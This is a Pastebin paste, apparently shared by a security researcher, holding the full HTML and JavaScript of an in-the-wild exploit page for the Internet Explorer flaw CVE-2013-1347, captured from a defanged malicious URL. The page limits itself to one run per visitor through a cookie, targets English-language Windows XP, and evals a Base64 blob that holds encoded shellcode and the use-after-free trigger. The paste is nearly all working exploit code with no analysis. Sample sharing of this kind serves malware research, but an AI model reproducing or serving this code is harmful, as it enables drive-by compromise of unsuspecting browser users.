Advertisement
eromang

CVE-2013-1347 DOL index.php

May 6th, 2013
1,052
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # DOL /scripts/textsize.js to hxxp://dol[.]ns01[.]us:8081/update/index.php
  2.  
  3. <!doctype html>
  4. <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
  5. <head>
  6. <meta>
  7. <IMPORT namespace="t" implementation="#default#time2">
  8. </meta>
  9. <script src="./base64.js"></script>
  10. <script>
  11.  
  12. function getCookieVal (offset)
  13. {
  14.     var endstr = document.cookie.indexOf (";", offset);
  15.     if (endstr == -1)
  16.     {
  17.         endstr = document.cookie.length;
  18.     }
  19.     return unescape(document.cookie.substring(offset, endstr));
  20. }
  21. function GetCookie (name)
  22. {
  23.     var arg = name + "=";
  24.     var alen = arg.length;
  25.     var clen = document.cookie.length;
  26.     var i = 0;
  27.     while (i < clen)
  28.        {
  29.        var j = i + alen;
  30.        if (document.cookie.substring(i, j) == arg)
  31.           return getCookieVal (j);
  32.        i = document.cookie.indexOf(" ", i) + 1;
  33.        if (i == 0)
  34.           break;
  35.        }
  36.     return null;
  37.     }
  38. function SetCookie (name, value)
  39. {
  40.     var argv = SetCookie.arguments;
  41.     var argc = SetCookie.arguments.length;
  42.     var expires = (2 < argc) ? argv[2] : null;
  43.     var path = (3 < argc) ? argv[3] : null;
  44.     var domain = (4 < argc) ? argv[4] : null;
  45.     var secure = (5 < argc) ? argv[5] : false;
  46.     document.cookie = name + "=" + escape (value) +
  47.       ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  48.       ((path == null) ? "" : ("; path=" + path)) +
  49.       ((domain == null) ? "" : ("; domain=" + domain)) +
  50.          ((secure == true) ? "; secure" : "");
  51. }
  52. function DisplayInfo()
  53. {
  54.     var expdate = new Date();
  55.     var visit;
  56.     expdate.setTime(expdate.getTime() +  (24 * 60 * 60 * 1000*7 ));
  57.     if(!(visit = GetCookie("visit")))
  58.     visit = 0;
  59.     visit++;
  60.     SetCookie("visit", visit, expdate, "/", null, false);
  61.     return visit;
  62. }
  63. var num=DisplayInfo();
  64. if(num >1)
  65. {
  66.  
  67.     location.href="about:blank";
  68. }
  69.  
  70. function dl()
  71. {
  72.      var ua = window.navigator.userAgent.toLowerCase();
  73.  
  74.       var xmlhttp;
  75.       try
  76.       {
  77. xmlhttp = new XMLHttpRequest();
  78.       }
  79.       catch (e)
  80.       {
  81. var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  82. var success = false;
  83. for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  84. {
  85.   try
  86.   {
  87.      xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  88.      success = true;
  89.   } catch (e)
  90.   {}
  91. }
  92.      }
  93.     function callback()
  94.     {
  95. if(xmlhttp.readyState==4)
  96. {
  97.     if(xmlhttp.status==200)
  98.     {
  99.  
  100.     if(navigator.appName == 'Netscape')
  101.      var language = navigator.language;
  102.      else
  103.      var language = navigator.browserLanguage;
  104.      
  105.      if(language.indexOf('en')!=-1)
  106.      {
  107.          var xx = navigator.userAgent.split(";");
  108.     if(xx[2].indexOf("Windows NT 5.1")!= -1)
  109.     {
  110.       window.setTimeout(helo, 2000);
  111.     }
  112.      }
  113.      
  114.  
  115.  
  116.     }
  117. }
  118.     }
  119.     xmlhttp.open("get", "bookmark.png", true);
  120.     xmlhttp.onreadystatechange = callback;
  121.     xmlhttp.send(null);
  122. }
  123.     function helo()
  124.     {
  125.  eval(Base64.decode('ICAgICANCnVuaWNvcm49dW5lc2NhcGUoIkFCQ0QiKTsNCnVuaWNvcm4yPXVuZXNjYXBlKCJFRUVFIik7DQpmb3IoaT0wO2k8MjtpKyspew0KCXVuaWNvcm4rPXVuZXNjYXBlKCJBQkNEIik7DQoJDQp9dW5pY29ybis9dW5lc2NhcGUoIkFCIik7DQphX3NjID0iJXVlODQ0JXU3N2MxJXVlODQ0JXU3N2MxJXU0MDAxJXU3N2MxJXVlMGRhJXU3N2M0JXUwMGY4JXUwMDAxJXUzOGVhJXU3N2MyJXVlODQ0JXU3N2MxJXVmYTFjJXU3N2M0JXVmZmZmJXVmZmZmJXVmZmZmJXVmZmZmJXUyN2U1JXU3N2MxJXUyN2U1JXU3N2MxJXVlMGRhJXU3N2M0JXUxNDY3JXUyY2ZlJXVlYjgwJXU3N2M0JXU4ZmJjJXU3N2M1JXU0ZmNkJXU3N2MzJXUwNGE3JXUyY2ZlJXVlYjgwJXU3N2M0JXU0MDAxJXU3N2MxJXUwNDhhJXU3N2MzJXU3YTQyJXU3N2M0JXU2ZWZiJXU3N2M0JXVhYWNjJXU3N2MyJXViODYwJXU3N2MzJXUxMTBjJXU3N2MxJXUyZGY5JXU3N2MxJXU1NDU5JXU3N2MzJXUyNThiJXUwMTAwJXUwMDAxIjsNCg0KYl9zYyA9ICIldTEwRUIldTRCNUIldUM5MzMldUI5NjYldTA2QzkldTM0ODAldUQ1MEIldUZBRTIldTI4RUIldUVCRTgldUZGRkYldTQ1RkYldTQ1NDUldTg1OEUldUQ5NkQldTE0QzQldUJGQTIldUJEOTUldUM1RDUldUQ1RDUldUQ1QkQldUQ1QzUldTg2RDUldUM1MkEldUI0OEQldTExNTQldUQ0RDUldUQ1RDUldUVCM0UldTBFM0QldTJBMkEldTZDMkEldUQ0RDEldUQ1RDQldUQ0NUMldTE0NTYldTEyRDEldUQ1RDQldUQ1QzUldUJERDUldUQ0RDkldUQ1RDQldTk1QkYldUREQkQldUQ0RDQldUJERDUldUQ0RDEldUQ1RDQldTJBQkYldTZEODEldUQ1NUMldUQ1RDUldUQ1NkYldTJCRDYldTJBQUEldTU0QzcldUQ1MzkldUQ1RDQldUI1RDUldUQ1M0UldTM5NTQldUQxRDUldUQ1RDUldTI5NUUldTE1RTYldTc0QjEldUQ1RTUldUQ1RDUldTk1NUUldTVFRDkldUMxOTUldTgyODMldTM5NTQldUQ3RDUldUQ1RDUldTIxNUUldTFENUUldTUxMTIldTk1RjEldUQ1RDQldUJFRDUldUE3QjAldTEyQkIldUYxNTEldUQ0OTEldUQ1RDUldUI5QjAldUU3RTYldTUxMTIldTlERjEldUQ1RDQldTlFRDUldTg3OTAldTEyOUIldUYxNTEldUQ0OTkldUQ1RDUldTk5OTAldUU3RTYldTBCNUUldTg1ODQldTBCNUUldUVCM0QldUQ1RDQldTU4RDUldTk1NUIldUQ1RDQldTNERDUldUQ0NEQldUQ1RDUldTJENTYldUExRDQldThEREYldTVFOEMldUVFRDUldUExMUQldTNFRjEldThEMDgldTVFOEMldUM1QUQldUQ1NUUldTZCNUMldUQ0QjUldUQ1RDUldTFCM0UldThDOEQldTExNTQldUQ3RDUldUQ1RDUldThCOEEldTIyNUUldUUzM0MldUQ1RDEldTNFRDUldTVFMkIldUI1NTMldUQ1RDQldTU0RDUldUQ1MTEldUQ1RDcldThBRDUldTU0OEIldUQ1MzkldUQ1RDYldUJERDUldTg2MkUldUIzQzAldUI2QkQldTA0NUMldUJEOUEldUExRTcldUQ5NDQldUVDQkQldUE4MzcldUJENTYldUM2NUIldTc5REYldTQ2QkQldTMxRTcldUJENDEldTAwODUldTFFNEUldTk2QkQldTc5NkIldUJEMEUldUUzNjcldUM2REEldTExQkQldUNBNTgldUJEQTEldUZBODQldUQ0NzcldTgyQkQldUQ4QjMldUJEMkEldTUyNEUldTMwNUUldTM4QkQldTJBN0EldUJENjEldUNDMTcldUQ0OUUldTY0QkQldTNFREEldUJERDIldThDQjIldUNCMEIldTIxNUUldUFCNTgldUU2MjEldTYyMEUldUZFRDEldTZFMzYldUU2QjkldUQ1RTcldUJEODYldUJEQTYldUI5QjAldUU2ODEldUIxMDcldThGNUUldTVFRTUldUQ5OUUldTlDNUUldTVFQzkldTVFREMldUREQkMldUU4NzgldTg2MkUldUIzQzAldUQwQTAldTJBNDAldTJEODIldUI1NDAldTkwNUUldUQ2RTkldTU2MTAldTlEMTUldTdBNkMldTQwM0EldTJBQTkldTVFMDQldUQ2MUQldTVFMTgldUY1OEMldTA4RDYldTJBRTYldTVFOTIldTZFRTEldTIwRDYldURBNEMldUQzNkIldTExRUYldUREQTEldTFGMTQldUQ2RDIldTkzMDUldTI0M0UldTgxRUUldUM5RjEldTMxQTAldThDNUUldUQ2RjEldUIzMDgldUU5NUUldTVFQUUldTU2MTQldUMxM0QldTdBNkUldTQwM0EldTJBQTkldTVFMDYldUQ2MEQldUQ2MDgldTZFRjkldThBNDAldTgyN0UldUU4QjQldTg2MkUldUIzQzAldTQxQTAldTdGM0MldUQ1RDUldTgyRDUldTgzODUldTI1NUUldTJFNUUldTk1NkMldUQ1RDUldUU2RDUldTI2MTUldTVFN0UldUU2MTMldUU2MjMldUU2MUMldTVFMkEldUZEODUldTJGNTYldUExRDUldUIzQzQldUQ5NUUldUVGRUYldUExM0MldTVEREMldUU2RDkldTEyNTYldTkzRDcldTNBM0UldThEOEIldTE2OEEldTgyODQldTVFODMldUU2MjQldTU0MkEldUQ1MkEldUQ1RDQldUExRDUldTVFQ0QldUVFQzEldUVFOTIldUEwQzMldTVFMjUldUVFODEldUVFRDYldUQxODMldTMyQTAldUQ0NkQldUQ1RDUldTNFRDUldTZERDAldUQ1RDUldUQ1RDUldThBOEIldTE2OEMldTgyODQldTVFODMldUU2MjQldTU0MkEldUQ1MkEldUQ1RDQldUExRDUldTVFRjgldUVFQzEldUVFOTIldUEwQzMldTVFQzUldUVFODEldUVFRDYldUQxODMldTMyQTAldUQ0NkQldUQ1RDUldTNFRDUldUVFQ0YldUREODMldTBFQTAldTgxNUUldUQ2RUUldTgzRUUldUEwRDkldTZEMDcldUQ1RDQldUQ1RDUldUQwM0UldUQ1NkQldUQ1RDUldThCRDUldThDOEEldTU2MTYldTkxM0EldTIyNUUldTRCNTgldUQ0RDUldUQ1RDUldUQ1QkYldUY1QkYldUJGODYldTJBRDUldTk1ODMldTE1RTYldTU1OTUldUQ2RTkldUEwRDUldTVDMkMldTUxNTMldUQ1RDUldTEyRDUldUQ2RDEldTk2ODkldUJCQkEldTkxMTIldUQxRDYldUIwQTEldUExQkIldTkxMTIldURERDYldTlDRkIldUUwOTAldTkxMTIldUQ5RDYldUJDODkldUIxQkIldTkxMTIldUM1RDYldUFEQjAldUIxRkIldTkxMTIldUMxRDYldUExQjQldUQ1RDUldTZCNTgldUQ3RDUldUQ1RDUldUQ1NkMldUQ1RDQldUU2RDUldTI2MTUldTU0N0YldUQ1M0EldUQ1RDQldTgyRDUldUQ1QkQldUQ1RDQldTJBRDUldUUxODMldTE1RTYldTU1OTUldUQyRTkldUEwRDUldTVDMkMldTQ1NTMldUQ1RDUldTEyRDUldUQyRDEldUJBQkYldUIwQkUldTkxMTIldUQxRDIldUE1RkIldUIyQkIldTkxMTIldURERDIldUQ1RDUldUQ1RDUldTRCNTgldUQ0RDUldUQ1RDUldUQ1QkYldTg2ODIldTkzNUUldTNERDEldUQ2OTkldUQ1RDUldTJENTYldURBRDQldTAzNTAldUQ1RDQldUJGRDUldUJGRDUldUJGRDUldUJGRDYldUJGRDUldUJERDQldUQ1RDUldTU1RDUldTVFODIldUY5OTMldUZFM0QldUQ1RDYldUU4RDUldTJBMkEldURBMkEldTUzNUMldUQ1NTUldUQ1RDUldTUxREEldUQ0NzgldUQ1RDUldUQ1QkYldUQ1QkYldTg1QkYldTVFODUldUYxOTMldURFM0QldUQ1RDYldUJGRDUldTU4RDUldUFEOUIldUJEODQldUQ1NTUldUQ1RDUldTVCNTgldUQ2RDUldUQ1RDUldTVFODQldTU1NUIldUQ1RDUldTg0RDUldTkzNUUldTNERjUldUQ3M0YldUQ1RDUldTUzNUUldUQ1NTUldUQ1RDUldTVFODUldUMxOTMldTBFM0QldUQ1RDcldTU4RDUldUQ1NEIldUQ1RDQldTVFRDUldTUxNTMldUQ1RDUldTVFRDUldTUxNUIldUQ1RDUldTU4RDUldUQ1NEIldUQ1RDQldUU2RDUldTU2MkEldUU1MkEldTUxREEldUQ0OUUldUQ1RDUldTUxNTgldUQ1RUIldUQ1RDYldTU4RDUldUQ1NEIldUQ1RDQldTU2RDUldUQ5MTIldTY2M0QldUQ1RDUldTg2RDUldTI3M0QldUQ1RDUldTU2RDUldTJBMkQldUQ3QTAldTAwM0UldTUzNUMldUQ1NUQldUQ1RDUldTVFODYldTVENTMldUQ1RDUldUJGRDUldUJGRDUldUJGRDUldTg1RDQldTkzNUUldTNERjEldUQ3QUYldUQ1RDUldTM5NTQldUQxRDUldUQ1RDUldTI5NUUldTM5NTQldUQ0RDUldUQ1RDUldUQ1QkYldTYzMkEldUQ1NUQldUQ1RDUldTAwM0QldUQ1RDUldUJGRDUldTU4RDUldUE1OTMldUJEODUldUQxRDUldUQ1RDUldTJBODIldTVENjMldUQ1RDUldTJBRDUldUY1ODMldUUyNTQldUQ1NDUldUQ1RDUldUQ1QkYldTYzMkEldUQ1NUQldUQ1RDUldTc4M0QldUQ1RDUldUJGRDUldTU4RDUldUExOTMldUJEODUldUQxRDUldUQ1RDUldTJBODIldTVENjMldUQ1RDUldTJBRDUldUM5ODMldTExNTQldUQwRDUldUQ1RDUldTVFOEUldTVENTMldUQ1RDUldTg1RDUldTkzNUUldTNEQzEldUQ3RDkldUQ1RDUldUM1M0UldUQ1QkYldTVFODYldUNEOTMldTAzQkQldTE0OEIldTNDQTIldUQ0MkYldUQ1RDUldTNFM0QldTJBMkEldTNDMkEldUQ1NTYldUQ1RDUldTg0ODMldTVFODIldTVFMjUldTVFMkUldTU2MTQldUQ4MTUldTJERDYldTAyNUUldTI1NkMldUQ1RDUldUZFRDUldUU2MUQldTI2MTUldTVFN0YldTVDRDMldTVFRDcldUQxOTMldTk3NUMldTEyRDEldUREOTcldUI3ODkldUJBQkEldTk3MTIldUJFRDkldUI0QjgldTEyQTcldUM1OTcldThFQkUldTg4RTQldTk3MTIldUZCQzEldUJCQTUldThBQjIldThCOEMldTgyMTYldUE5NUUldURERjEldUJGODQldUJGRDUldUJGODUldUJGRDYldUJGRDUldUJERDUldUQ1RDUldTE1RDUldTVFODIldUY5OTMldTU4M0QldUQ1RDQldThDRDUldTE2OEEldTg2ODUldTkxNUUldUQ5RjEldTg5NUUldUM1RjEldUQ1QkYldUQ1QkYldTg1ODYldTkzNUUldTNERjEldUQ0QTcldUQ1RDUldThEOEUldUREMTcldTNFRDUldThDRjUldTBFRTYldTVFQjEldTVDRTYldUQxOUIldTJCNUUldTBCNUUldUUzNUUldTJCNTYldUExMkEldTVFQzkldTNFMkUldThDMjYldTVDQjUldUQxOUUldTNFQjQldTNEQ0EldTJBMEUldTJBMkEldTExNTQldUQ2MDUldUQ1RDUldUQ1M0UldTVFQjQldTNEMEEldTJBMzYldTJBMkEldUQ1QkYldUM5NkQldTE0QzcldTJBQTIldTE2QzUldTE1RTYldTBFRTYldUQ1NjgldUQ0RDQldTVFRDUldUQ1QjgldUQ1NkMldUQ0RDUldUU2RDUldUVFMEUldURBMEMldURCNTEldUQ1RDQldTU2RDUldUQxMTYldTEwNTYldTVFRDEldUQ1QTAldTJCNTQldTdFMTgldTA5NkYldTMyQTAldTM4NTYldTVFQ0QldTVFMzAldTU0MzkldUQ1MzkldUQ1RDcldTNDRDUldUQ1MEIldUQ1RDUldUU2OEMldUIxMEUldUU2NUUldTlCNUMldUU2RDEldUU2MEUldTZGMjMldUQ1RDUldUQ1QzYldURFM0UldTE3NTYldTNFRDEldUIzRDMldTFGNTQldURBMkEldTU0OTcldUQ1MkYldUQ1RDUldURBRDMldTE1NTgldUQ1RDUldTg3RDUldTk2QkYldTE4OEQldUU5RkIldThGRDAldTM2QTEldTE3NUUldTNENTYldTZDRTUldTNBN0EldUE5NDAldTA0MkEldTBENUUldTVFODcldUJGMDYldThEOTYldUZCMTgldUQwRTkldUExOEYldTVFMTYldTU2MTYldUU1M0QldTdBNkMldTQwM0EldTJBQTkldTVFMDQldTg3MEQldTA2NUUldTk2QkYldTE4OEQldUU5RkIldThGRDAldTdEQTEldTIzNTAldUUxQTAldTE2NUUldTNENTYldTZDRTUldTNBN0EldUE5NDAldTA0MkEldTIzRTgldUI1MjgldUEwQjYldTVFNDQldTU2MTYldTk1MTUldTdBNkMldTQwM0EldTJBQTkldTVFMDQldTU0MUQldTQxMkMldUI2MjkldURBQjYldUEyNTAldTJBMkEldTVFMkEldTNDRTcldTJBQkMldTJBMkEldTE2NUUldTNENTYldTZDRTUldTNBN0EldUE5NDAldTA0MkEldUQ0RTgldTExMEQldURBQTIldThDNTAldTJBMkEldTVFMkEldTU2MTYldTk1MTUldTdBNkMldTQwM0EldTJBQTkldTVFMDQldTU0MUQldTAwMkMldTE0OEIldURBQTIldUVBNTAldTJBMkEldUI1MkEldUU3NUMldTNDQjQldTJBRTMldTJBMkEldUM4M0QldTJBMkEldTU0MkEldTA1MTEldUQ1RDYldTNFRDUldTVFMzgldTE2MzAldUVENTUldUExM0QldTU1REYldTNDRUQldUQwQTEldUVENTUldUEwM0UldTU0QzQldUQwQUQldTQ1NDUldTQ1NDUldUREQTEldTJBNUUldTVFODAldTU4MzkldUQwOTUldTM1MkEldTQ1NDUldTQ1NDUldTQ1NDUldTQ1NDUldTQ1NDUldTQ1NDUldTQ1NDUldTQ1NDUiOw0KdW5pY29ybis9dW5lc2NhcGUoYV9zYytiX3NjKTsNCmFuaW12YWx1ZXM9dW5lc2NhcGUoIiV1ZDgwMSV1NzdjNCIpOw0KZm9yKGk9MDtpPDB4NzAvNDtpKyspew0KCWlmKGk9PTB4NzAvNC0xKXsNCgkJYW5pbXZhbHVlcys9dW5lc2NhcGUoIiV1NWVkNSV1NzdjMSIpOw0KCQkNCgl9ZWxzZSB7DQoJCWFuaW12YWx1ZXMrPXVuZXNjYXBlKCIldWQ4MDEldTc3YzQiKTsNCgkJDQoJfQ0KfWFuaW12YWx1ZXMrPXVuaWNvcm47DQpmb3IoaT0wO2k8MTM7aSsrKXsNCglhbmltdmFsdWVzKz0iO3JlZCI7DQoJDQp9DQpmMD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzcGFuJyk7DQpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGYwKTsNCmYxPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NwYW4nKTsNCmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoZjEpOw0KZjI9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc3BhbicpOw0KZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChmMik7DQpkb2N1bWVudC5ib2R5LmNvbnRlbnRFZGl0YWJsZT0idHJ1ZSI7DQpmMi5hcHBlbmRDaGlsZChkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdkYXRhbGlzdCcpKTsNCmYxLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NwYW4nKSk7DQpmMS5hcHBlbmRDaGlsZChkb2N1bWVudC5jcmVhdGVFbGVtZW50KCd0YWJsZScpKTsNCnRyeXsNCglmMC5vZmZzZXRQYXJlbnQ9bnVsbDsNCgkNCn1jYXRjaChlKXsNCgkNCn1mMi5pbm5lckhUTUw9IiI7DQpmMC5hcHBlbmRDaGlsZChkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdocicpKTsNCmYxLmlubmVySFRNTD0iIjsNCkNvbGxlY3RHYXJiYWdlKCk7DQp0cnl7DQoJYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnbXlhbmltJyk7DQoJYS52YWx1ZXM9YW5pbXZhbHVlczsNCgkNCn1jYXRjaChlKXsNCgkNCn0='));
  126.  
  127.     }
  128. </script>
  129. </head>
  130. <body onload='dl();'>
  131. <t:ANIMATECOLOR id="myanim"/>
  132. </body>
  133. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement